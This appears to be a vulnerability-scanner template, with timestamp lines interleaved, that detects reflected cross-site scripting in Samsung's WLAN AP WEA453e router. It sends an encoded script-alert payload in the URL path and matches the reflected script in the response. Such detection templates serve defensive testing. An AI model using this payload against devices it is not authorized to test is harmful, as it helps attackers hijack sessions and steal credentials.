2021-02-15 05:53:18 +00:00
id : samsung-wlan-ap-xss
info :
2022-09-23 17:53:08 +00:00
name : Samsung WLAN AP WEA453e - Cross-Site Scripting
2021-02-15 05:53:18 +00:00
author : pikpikcu
2022-09-23 17:53:08 +00:00
severity : high
description : Samsung WLAN AP WEA453e router contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
2022-04-22 10:38:41 +00:00
reference :
- https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : xss,samsung
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-04-22 10:38:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-15 05:53:18 +00:00
- method : GET
path :
- "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition : and
matchers :
- type : word
words :
- "/tmp/www/<script>alert(document.domain)</script>"
part : body
2021-02-15 15:59:12 +00:00
2021-02-15 05:53:18 +00:00
- type : status
status :
- 404
2021-02-15 15:59:12 +00:00
- type : word
words :
- "text/html"
2022-09-09 17:34:37 +00:00
part : header